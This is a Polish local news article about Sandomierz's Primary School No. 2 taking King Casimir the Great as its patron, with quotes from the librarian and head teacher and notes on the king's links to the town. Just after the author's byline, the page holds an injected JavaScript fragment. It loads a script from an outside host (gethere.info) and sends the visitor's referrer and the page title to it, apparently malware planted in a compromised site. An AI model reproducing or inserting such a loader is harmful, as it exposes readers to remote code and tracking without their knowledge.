W Sandomierzu

Król Kazimierz Wielki patronem „Dwójki”

Król Kazimierz Wielki patronem „Dwójki”

Imię Króla Kazimierza Wielkiego nadano Szkole Podstawowej Nr 2 w Sandomierzu. Radni jednogłośnie podjęli taką decyzję podczas ostatniej sesji Rady Miasta. O nadanie szkole patrona wnioskowała Rada Pedagogiczna, Rada Rodziców i Samorząd Uczniowski.

img_7416-kopiowanie

Nadanie szkole imienia Króla Kazimierza Wielkiego jest uhonorowaniem 90 – lecia funkcjonowania placówki. Działania edukacyjne i wychowawcze związane z tym wydarzeniem są traktowane przez Radę Pedagogiczną i dyrekcję jako proces wspierający pracę szkoły w kształtowaniu postaw patriotycznych i obywatelskich uczniów. Celem jest również wzbogacenie szkolnej tradycji.

-Najpierw w poszczególnych klasach odbywały się lekcje wychowawcze i rozmowy na temat patrona i jego roli w życiu szkoły. Później nauczyciele przeprowadzili głosownie, w wyniku którego wyłoniono postać Króla Kazimierza Wielkiego. Następnie młodzież zapoznała się z historią przyszłego patrona szkoły. Na pewno konieczne będzie wprowadzenie drobnych zmian do programu wychowawczego i edukacyjnego naszej szkoły. Wiąże się to z autorytetem , którym jest Kazimierz Wielki. Uczniowie poznają bliżej postać swojego patrona – powiedziała Beata Audycka, bibliotekarka.

Proces związany z nadaniem imienia placówce nie był łatwy. W pracach przygotowawczych brali udział wszyscy nauczyciele, uczniowie, a także rodzice. Starania trwały od września. Wspólny wniosek został złożony do Urzędu Miejskiego 5 października. Król Kazimierz Wielki będzie patronem szkoły jednak data oficjalnego nadania „Dwójce” jego imienia nie jest jeszcze znana. Prawdopodobnie uroczystość odbędzie się w czerwcu lub we wrześniu, podczas rozpoczęcia nowego roku szkolnego 2017/2018. Wszystko zależy od decyzji burmistrza i Rady Miasta oraz funduszy jakie szkoła otrzyma od miasta. „Dwójka” zyska nową pieczęć szkolną, tablice urzędowe oraz sztandar.

img_7421-kopiowanie

-Postać patrona szkoły, tak ważna w dziejach Sandomierza, stanie się wzorem osobowym pozwalającym na wzmocnienie wspólnej tożsamości- poinformowała Elżbieta Sobolewska, Dyrektor Szkoły Podstawowej nr 2 w Sandomierzu .

Król Kazimierz Wielki był związany z Sandomierzem i ziemią sandomierską. To z jego inicjatywy wzniesiono m.in. mury obronne, bramy: Opatowską, Zawichojską, Lubelską i Krakowską, Zamek Królewski, spichlerz i Bazylikę Katedralną. Król odwiedził miasto aż 18 razy, jak podają historycy spędził tu łącznie około 25 miesięcy. Udzielał mieszkańcom wielu przywilejów, np. związanych z handlem. Sandomierska Gmina Żydowska była największą w Małopolsce. Podobnie jak krakowski Kazimierz, otrzymała od Kazimierza Wielkiego przywilej opieki królewskiej. Król ostatni raz był w Sandomierzu tuż przed śmiercią w październiku 1370 roku.

Kinga Kędziora Palińska

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Kliknij aby dodać komentarz

Zostaw komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

W Sandomierzu

Więcej w W Sandomierzu

Pożar koparko – ładowarki w Sandomierzu

tsa24.com13 maja 2021

Manual dla branży turystycznej

tsa24.com13 maja 2021

“Sandomierscy KREWni z wyboru – tydzień krwiodawstwa”

tsa24.com13 maja 2021

Policja poszukuje zaginionego mieszkańca Sandomierza

tsa24.com12 maja 2021

Zwycięzcy X Międzyprzedszkolnego Konkursu Recytatorskiego

tsa24.com12 maja 2021

Zgłoś swoje propozycje zmian w rozkładzie jazdy autobusów

tsa24.com12 maja 2021

NOC MUZEÓW 2021 w Muzeum Okręgowym w Sandomierzu

tsa24.com12 maja 2021

Worki z nakrętkami z Klimontowa zasilą zbiórkę Bartusia

tsa24.com11 maja 2021

Poruszasz się hulajnoga elektryczną? Od 20 maja wchodzą nowe przepisy 

tsa24.com11 maja 2021